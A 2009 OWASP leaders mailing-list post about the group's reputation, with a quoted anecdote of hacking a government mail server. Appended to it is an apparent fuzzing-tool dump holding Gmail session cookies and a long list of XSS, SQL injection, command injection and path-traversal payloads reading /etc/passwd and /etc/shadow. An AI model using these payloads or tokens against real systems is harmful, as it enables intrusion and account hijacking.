[Owasp-leaders] Would the real OWASP please stand up!

Eoin eoin.keary at owasp.org
Fri Sep 25 10:34:49 EDT 2009


Sure,
I started doing the testing guide (from Dan) and code review guides in order
to exercise my fingers!

2009/9/24 daniel cuthbert <daniel.cuthbert at owasp.org>

> This isn't something new, it's been happening since the late 90's.
> IT has always been full of people who might be technically gifted but often
> lacking in basic social skills. When we started OWASP back in the day, it
> wasn't about ego, or being leet, it was about helping fix the poor state of
> web 1.0. Many people rely on what we do, so who really gives a monkeys about
> what others think?
>
>
>
> 2009/9/23 Arturo 'Buanzo' Busleiman <buanzo at buanzo.com.ar>
>
> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA512
>>
>> I really hate it when "real" security professionals look down to me and
>> say "oh, you're the owasp
>> guy". For instance, and I was talking the other day with someone from
>> another webappsec
>> organization, and basicly, he said: "Sorry, you're an OWASP guy, I can't
>> talk to you". My answer
>> was: "Oh, I wasn't aware kindergarden had webappsec groups".
>>
>> Lots of people on the industry dislike my project just because it's OWASP
>> sponsored. And I don't
>> give a **** about the opinion of those individuals.
>>
>> The real OWASP is the people who can see beyond the stupidity and jealousy
>> of others, and kick it
>> away and continue to love OWASP and support it. I've been in the IT
>> security business since 1996 (I
>> was 14 years at that time), when I hacked into Argentina's presidency's
>> email server and contacted
>> their "systems guy" and told him how to reproduce the attack, how to fix
>> it (it was an IRIX 5.3
>> operating system running a very vulnerable set of cgi scripts), and how to
>> start thinking about
>> security in a more open way ("use linux" - back in 1996 that was a blast
>> :P).
>>
>> And the past 3 years I've seen a big change in the industry. Lots of
>> "floss activists" becoming
>> "security experts", advanced "windows power users" becoming IT security
>> developers, and things like
>> that. And I sense that the hacker philosophy is being lost in a big noisy
>> inter-group flamewar full
>> of politics and bureaucratic stuff, when we should be focusing on
>> developing tools, analyzing
>> malware, educating programmers on how to write secure code, educating
>> users, and HACKING STUFF UP.
>>
>> And I've found LOTS of that kind of people in OWASP: real hackers with
>> real hacker philosophy and
>> code of ethics, great programmers. And that is why I'll continue to
>> support OWASP.
>>
>> (And I know, you, the childish guy-leader from the other webappsec group,
>> are reading this: grow up).
>>
>> And this will be my only public rant :)
>>
>> - --
>> Arturo "Buanzo" Busleiman / Arturo Busleiman @ 4:900/107
>> Independent Linux and Security Consultant - SANS - OISSG - OWASP
>> http://www.buanzo.com.ar/pro/eng.html
>> Mailing List Archives at http://archiver.mailfighter.net
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1.4.9 (GNU/Linux)
>> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>>
>> iEYEAREKAAYFAkq6m4wACgkQAlpOsGhXcE2BiwCfbeJQ1Xb4bFYaGCyiHYlxwOpd
>> QW0An1ZAv+ILzaki6QO39rkA7oxfYSEN
>> =n7ij
>> -----END PGP SIGNATURE-----
>> _______________________________________________
>> OWASP-Leaders mailing list
>> OWASP-Leaders at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
>>
>
>
> _______________________________________________
> OWASP-Leaders mailing list
> OWASP-Leaders at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-leaders
>
>


-- 
Eoin Keary CISSP CISA
https://www.owasp.org/index.php/OWASP_Ireland_AppSec_2009_Conference

OWASP Code Review Guide Lead Author
OWASP Ireland Chapter Lead
OWASP Global Committee Member (Industry)

http://asg.ie/
https://twitter.com/EoinKeary
YEHG.Net Greasemonkey Web Page Fingerprinter   [x]

*[URL]*

http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy

*[Headers]*

Server: GFE/1.3<http://www.scroogle.org/cgi-bin/nbbw.cgi?Gw=GFE/1.3%20vulnerabilities>

Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Fri, 25 Sep 2009 14:32:17 GMT
refresh: 0;URL=http://mail.google.com/mail/
Content-Type <http://mail.google.com/mail/Content-Type>: text/html;
charset=UTF-8
Content-Length: 0
X-Content-Type-Options: nosniff
X-XSS-Protection: 0

Content-length: 152
Cookie: S=gmail=G53qR1wZG-e998DrXNOB-A:gmproxy=TQMztwGg-WwypWyjBNSH_g;
GMAIL_AT=xn3j2wkm6im4yet5dfumdd9p8iei33; gmailchat=eoinkeary at gmail.com/82061;
GMAIL_IMP=tl-si-inbox-3977%2Fco-o%2Fco-o%2Fco-o%2Fco-o%2Fco-o%2Fco-o;
PREF=ID=ab691069b576110e:TM=1236554542:LM=1253871520:GM=1:S=CHdrfHUn_ze8wvX8;
TZ=-60;
SID=DQAAAHoAAACcvADRrJVsIRS-1g3xmTJ2-pX21OfyDrX3lWZevmvkTJ3wSZNA7yhGuTXUUlvdinTkclgcx-fQ48_pAd6x4pioKCh5uUQpVSdvr6KrntgnwnoKFWxXg4ovEJGbr3S-WePlPTYkQGhXP3fGjlnu85-2O4L1-0FCH33-GL_GnuXLCw
  => Edit Cookie

*[RECON]*

---Lookup---WebhostinfoDNSStuffRobtexDNSNetwork DNSRecordsDomainTools
SamSpadeHost2IPNetcraft WhatSiteNetcraft SiteReportNetwork TracertNetwork
LookupNetwork WhoisBetterwhoisNetwork ExpressPortScan1PortScan2FlashPortScanMX
ProfileMX LookupMX RecordsdirIndexingcache:link:site:emailfile:pdffile:xls
file:xmlfile:docfile:pptfile:txtfile:rtffile:conffile:configfile:inifile:lst
file:zipfile:gzipfile:emlfile:psfile:exefile:rpmfile:dbfile:mdbfile:log
file:passwdfile:pwd  [Launch all]   [Prepend Proxy]


*[BruteForce Scan]*

-- Select ---Dic-SmallDic-ComprehensiveBigCatalaCommonEuskeraMediumPasslist
SpanishSubdomainsUserlistWeak_passwords_module_passlist
Weak_passwords_module_userlistCommon_passNamesApacheCgiCgisColdfusionDomino
FatwireFatwire_pagenamesFrontpageIisIplanetJrunNetwareOracle9iSharepoint
SunasTestsTomcatVignetteWeblogicWebsphereo-iiso-cfmo-jsp  [Start]  [View]

Loading ...

Do other stuffs.
Seem slowly? As it doesn't do multi-requests,
it's likely that web server IDS may not detect scanning.
But it's for dictionary scanning only.

[Stat]

Total Form: 0
Total Link: 8

*[Fuzz URL]*

http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy

Select Fuzz Type: Fuzz [default]BackupFilesHeaderCheckCSRFCS Framing      [
Help]

  Fuzz Options  Fuzz Db: -- Check --1) ---!><!--">xxx<P>yyy..2)
"><script>"..3) <script>..</script&gt..4) <<script>..;//<&lt..5)
<script>..</script&gt..6) '><script>..<..7) "><script>..;</script&gt..8)
\";..;//..9) %3cscript%3e..;%3c/script%3e..10)
%3cscript%3e..;%3c%2fscript%3e..11) %3Cscript%3E..;%3C/script%3E..12)
&ltscript&gt..;</sc..13) &ltscript&gt..;&lt..14)
<xss><script>alert('XSS')&lt..15) <IMG%20SRC='javascript:..16) <IMG
SRC="javascript:alert('XSS'..17) <IMG SRC="javascript:alert('XSS'..18) <IMG
SRC=javascript:alert('XSS')>..19) <IMG SRC=JaVaScRiPt:alert('XSS')>..20)
<IMG SRC=javascript:alert(&quot;XSS&quo..21) <IMG
SRC=`javascript:alert("'XSS'..22) <IMG """><SCRIPT>alert(..23) <IMG
SRC=javascript:alert(String.fromCharCode(8..24) <IMG%20SRC='javasc ript:..25)
<IMG SRC="jav ascript:alert('XSS'..26) <IMG SRC="jav&#x09;ascript:alert('..27)
<IMG SRC="jav&#x0A;ascript:alert('..28) <IMG SRC="jav&#x0D;ascript:alert('..29)
<IMG SRC=" &#14; javascript:alert(�..30) <IMG
DYNSRC="javascript:alert('XSS�..31) <IMG LOWSRC="javascript:alert('XSS�..32)
<IMG%20SRC='%26%23x6a;avasc%26%23000010rip..33) <IMG
SRC=&#106;&#97;&#118;&#97;..34) <IMG SRC=&#0000106&#0000097&#000011..35)
<IMG SRC=&#x6A&#x61&#x76&#x61&a..36)
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%25..37)
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A..38)
';alert(String.fromCharCode(88,83,83))//\�..39) '';!--"<XSS>=&{()}..40) A..41)
TRUE..42) FALSE..43) 0..44) 00..45) 1..46) -1..47) 1.0..48) -1.0..49) 2..50)
-2..51) -20..52) 65536..53) 268435455..54) -268435455..55) 2147483647..56)
0xfffffff..57) NULL..58) null..59) \0..60) \00..61) < script > < / script>..62)
%0a..63) %00..64) +%00..65) \0..66) \0\0..67) \0\0\0..68) \00..69) \00\00..70)
\00\00\00..71) $null..72) $NULL..73) `id`..74) `dir`..75) ;id;..76) ;read;..77)
;netstat -a;..78) \nnetstat -a%\n..79) \"blah..80) |id|..81)
&quot;;id&quot;..82) id%00..83) id%00|..84) |id..85) |dir..86) |dir|..87)
|ls..88) |ls -la..89) ;ls -la..90) ;dir..91) |/bin/ls -al..92) \n/bin/ls
-al\n..93) ?x=..94) ?x="..95) ?x=|..96) ?x=>..97) /index.html|id|..98)
/boot.ini..99) /etc/passwd..100) /etc/shadow..101)
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8...102)
../../../../../../../../../../../../etc/hosts%00..103)
../../../../../../../../../../../../etc/hosts..104) ../../boot.ini..105)
/../../../../../../../../%2A..106)
../../../../../../../../../../../../etc/passwd%00..107)
../../../../../../../../../../../../etc/passwd..108)
../../../../../../../../../../../../etc/shadow%00..109)
../../../../../../../../../../../../etc/shadow..110)
/../../../../../../../../../../etc/passwd^^..111)
/../../../../../../../../../../etc/shadow^^..112)
/../../../../../../../../../../etc/passwd..113)
/../../../../../../../../../../etc/shadow..114)
/./././././././././././etc/passwd..115) /./././././././././././etc/shadow..116)
\..\..\..\..\..\..\..\..\..\..\etc\pas..117)
\..\..\..\..\..\..\..\..\..\..\etc\sha..118)
..\..\..\..\..\..\..\..\..\..\etc\passw..119)
..\..\..\..\..\..\..\..\..\..\etc\shado..120)
/..\../..\../..\../..\../..\../..\../etc/pas..121)
/..\../..\../..\../..\../..\../..\../etc/sha..122)
.\\./.\\./.\\./.\\./.\\./.\\./etc/pass..123)
.\\./.\\./.\\./.\\./.\\./.\\./etc/shad..124)
\..\..\..\..\..\..\..\..\..\..\etc\pas..125)
\..\..\..\..\..\..\..\..\..\..\etc\sha..126)
..\..\..\..\..\..\..\..\..\..\etc\passw..127)
..\..\..\..\..\..\..\..\..\..\etc\shado..128) %0a/bin/cat%20/etc/passwd..129)
%0a/bin/cat%20/etc/shadow..130) %00/etc/passwd%00..131) %00/etc/shadow%00..132)
%00../../../../../../etc/passwd..133) %00../../../../../../etc/shadow..134)
/../../../../../../../../../../../etc/passwd%00.jp..135)
/../../../../../../../../../../../etc/passwd%00.ht..136)
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..137)
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..138)
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..139)
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..140)
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..141)
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..142)
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..143)
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..144)
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..145)
\\&apos;/bin/cat%20/etc/passwd\\&apos;..146)
\\&apos;/bin/cat%20/etc/shadow\\&apos;..147)
../../../../../../../../conf/server.xml..148)
/../../../../../../../../bin/id|..149) C:/inetpub/wwwroot/global.asa..150)
C:\inetpub\wwwroot\global.asa..151) C:/boot.ini..152) C:\boot.ini..153)
../../../../../../../../../../../../localstart.asp..154)
../../../../../../../../../../../../localstart.asp..155)
../../../../../../../../../../../../boot.ini%00..156)
../../../../../../../../../../../../boot.ini..157)
/./././././././././././boot.ini..158)
/../../../../../../../../../../../boot.ini%00..159)
/../../../../../../../../../../../boot.ini..160)
/..\../..\../..\../..\../..\../..\../boot.in..161)
/.\\./.\\./.\\./.\\./.\\./.\\./boot.in..162)
\..\..\..\..\..\..\..\..\..\..\boot.ini..163)
..\..\..\..\..\..\..\..\..\..\boot.ini%0..164)
..\..\..\..\..\..\..\..\..\..\boot.ini..165)
/../../../../../../../../../../../boot.ini%00.html..166)
/../../../../../../../../../../../boot.ini%00.jpg..167)
/.../.../.../.../.../..168)
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%..169)
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..170)
%0d%0aX-Injection-Header:%20AttackValue..171) [email protected]#0%^#0##[email protected]#0^^**(()..172)
%01%02%03%04%0a%0d%0aADSF..173) /,%ENV,/..174)
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/p..175)
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/s..176) %..177) #..178)
*..179) }..180)
;..181) /..182) \..183) \\..184) \\/..185) \\\\*..186) \\\\?\\..187) &lt..188)
&lt;..189) &LT..190) &LT;..191) <..192) <<..193) <<<..194) |..195) ||..196)
`..197) -..198) --..199) *|..200) ^'..201) \'..202) /'..203) @'..204) (')..205)
{'}..206) [']..207) *'..208) #'..209) !'..210)
[email protected]#$%%^#$%#[email protected]#$%[email protected]#$%^^**(()..211) %01%02%03%04%0a%0d%0aADSF..212) \t..213)
"\t"..214) &#10;..215) &#13;..216) &#10;&#13;..217) &#13;&#10;..218) #xD..219)
#xA..220) #xD#xA..221) #xA#xD..222) /%00/..223) %00/..224) %00..225) <?..226)
%3C..227) %3C%3F..228) %60..229) %5C..230) %5C/..231) %7C..232) %00..233)
/%2A..234) %2A..235) %2C..236) %20..237) %20|..238) %250a..239) %2500..240)
../..241) %2e%2e%2f..242) ..%u2215..243) ..%c0%af..244) ..%bg%qf..245)
..\..246)
..%5c..247) ..%%35c..248) ..%255c..249) ..%%35%63..250) ..%25%35%63..251)
..%u2216..252) &#60..253) &#060..254) &#0060..255) &#00060..256) &#000060..257)
&#0000060..258) &#60;..259) &#060;..260) &#0060;..261) &#00060;..262)
&#000060;..263) &#0000060;..264) &#x3c..265) &#x03c..266) &#x003c..267)
&#x0003c..268) &#x00003c..269) &#x000003c..270) &#x3c;..271) &#x03c;..272)
&#x003c;..273) &#x0003c;..274) &#x00003c;..275) &#x000003c;..276) &#X3c..277)
&#X03c..278) &#X003c..279) &#X0003c..280) &#X00003c..281) &#X000003c..282)
&#X3c;..283) &#X03c;..284) &#X003c;..285) &#X0003c;..286) &#X00003c;..287)
&#X000003c;..288) &#x3C..289) &#x03C..290) &#x003C..291) &#x0003C..292)
&#x00003C..293) &#x000003C..294) &#x3C;..295) &#x03C;..296) &#x003C;..297)
&#x0003C;..298) &#x00003C;..299) &#x000003C;..300) &#X3C..301) &#X03C..302)
&#X003C..303) &#X0003C..304) &#X00003C..305) &#X000003C..306) &#X3C;..307)
&#X03C;..308) &#X003C;..309) &#X0003C;..310) &#X00003C;..311) &#X000003C;..312)
\x3c..313) \x3C..314) \u003c..315) \u003C..316) something%00html..317)
&apos;..318) /&apos;..319) \&apos;..320) ^&apos;..321) @&apos;..322)
{&apos;}..323) [&apos;]..324) *&apos;..325) #&apos;..326) '..327) "..328)
#..329) -..330) --..331) ' --..332) --';..333) ' ;..334) = '..335) = ;..336)
= --..337) \x23..338) \x27..339) \x3D \x3B'..340) \x3D \x27..341)
\x27\x4F\x52 SELECT *..342) \x27\x6F\x72 SELECT *..343) 'or select *..344)
admin'--..345) ';shutdown--..346) <>"'%;)(&+..347) ' or ''='..348) ' or
'x'='x..349) " or "x"="x..350) ') or ('x'='x..351) 0 or 1=1..352) ' or 0=0
--..353) " or 0=0 --..354) or 0=0 --..355) ' or 0=0 #..356) " or 0=0 #..357)
or 0=0 #..358) ' or 1=1--..359) " or 1=1--..360) ' or '1'='1'--..361) "' or
1 --'"..362) or 1=1--..363) or%201=1..364) or%201=1 --..365) ' or 1=1 or
''='..366) " or 1=1 or ""="..367) ' or a=a--..368) " or "a"="a..369) ') or
('a'='a..370) ") or ("a"="a..371) hi" or "a"="a..372) hi" or 1=1 --..373)
hi' or 1=1 --..374) hi' or 'a'='a..375) hi') or ('a'='a..376) hi") or
("a"="a..377) 'hi' or 'x'='x';..378) @variable..379) , at variable..380)
PRINT..381) PRINT @@variable..382) select..383) insert..384) as..385) or..386)
procedure..387) limit..388) order by..389) asc..390) desc..391) delete..392)
update..393) distinct..394) having..395) truncate..396) replace..397)
like..398)
handler..399) bfilename..400) ' or username like '%..401) ' or uname like
'%..402) ' or userid like '%..403) ' or uid like '%..404) ' or user like
'%..405) exec xp..406) exec sp..407) '; exec master..xp_cmdshell..408) ';
exec xp_regread..409) t'exec master..xp_cmdshell 'nslookup www..410)
--sp_password..411) \x27UNION SELECT..412) ' UNION SELECT..413) ' UNION ALL
SELECT..414) ' or (EXISTS)..415) ' (select top 1..416)
'||UTL_HTTP.REQUEST..417)
1;SELECT%20*..418) to_timestamp_tz..419) tz_offset..420)
&lt;&gt;&quot;'%;)(&amp;+..421) '%20or%201=1..422) %27%20or%201=1..423)
%20$(sleep%2050)..424) %20'sleep%2050'..425) char%4039%41%2b%40SELECT..426)
&apos;%20OR..427) 'sqlattempt1..428) (sqlattempt2)..429) |..430) %7C..431)
*|..432) %2A%7C..433) *(|(mail=*))..434) %2A%28%7C%28mail%3D%2A%29%29..435)
*(|(objectclass=*))..436) %2A%28%7C%28objectclass%3D%2A%29%29..437) (..438)
%28..439) )..440) %29..441) &..442) %26..443) !..444) %21..445) ' or 1=1 or
''='..446) ' or ''='..447) x' or 1=1 or 'x'='y..448) /..449) //..450) //*..451)
*/*..452) @*..453) count(/child::node())..454) x' or name()='username' or
'x&..455) <name>','')); phpinfo(); exit..456) <![CDATA[<script>var
n=0;while(true){n++;..457) <![CDATA[<]]>SCRIPT<![CDATA[>]]>..458) <?xml
version="1.0" encoding="IS..459) <?xml version="1.0" encoding="IS..460)
<?xml version="1.0" encoding="IS..461) <?xml version="1.0" encoding="IS..462)
<?xml version="1.0" encoding="IS..463) <?xml version="1.0" encoding="IS..464)
<xml ID=I><X><C><![CDATA[<..465) <xml ID="xss"><I><B>&a..466) <xml
SRC="xsstest.xml" ID=I></x..467) <HTML xmlns:xss><?import namespace="..468)
test=1..469) test=true..470) test=yes..471) test=y..472) 7357=1..473)
7357=true..474) 7357=yes..475) 7357=y..476) admin=1..477) admin=true..478)
admin=yes..479) admin=y..480) adm=1..481) adm=true..482) adm=yes..483)
adm=y..484) adm1n=1..485) adm1n=true..486) adm1n=yes..487) adm1n=y..488)
access=1..489) access=true..490) access=yes..491) access=y..492) grant=1..493)
grant=true..494) grant=yes..495) grant=y..496) debug=1..497) debug=true..498)
debug=yes..499) debug=y..500) dbg=1..501) dbg=true..502) dbg=yes..503)
dbg=y..504) edit=1..505) edit=true..506) edit=yes..Click here to load  [
Insert]  [PCE <javascript:void(0)>]  [HackVertor <javascript:void(0)>]

Launch Window in seconds

If content-length     ==<=>=<>   , automatically close Window [Esp. for
Debug/Hidden]

If contents do         HAVENOT HAVE   , automatically close Window [Esp. for
vulnerability pattern matching]

Fuzz Index From      To

Fuzz Keywords: {XSS} {SQL} {TRA} {CMD} {FUZZ} {DEBUG}



Best Practice: Block all Ad-related JavaScript sources. Use AddblockPlus!

*[Custom JS Objects]*


*[Custom JS Variables]*

=>index  [type=number]  [value=0]

*[Custom JS Functions] Execute <javascript:var cus=prompt("Enter function
name","Function name","Function to
Execute");if(cus!=null&&cus!=""&&cus!="Function name"){eval(cus);}>*


  Job: None
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-leaders/attachments/20090925/85016bcf/attachment-0001.html 


More information about the OWASP-Leaders mailing list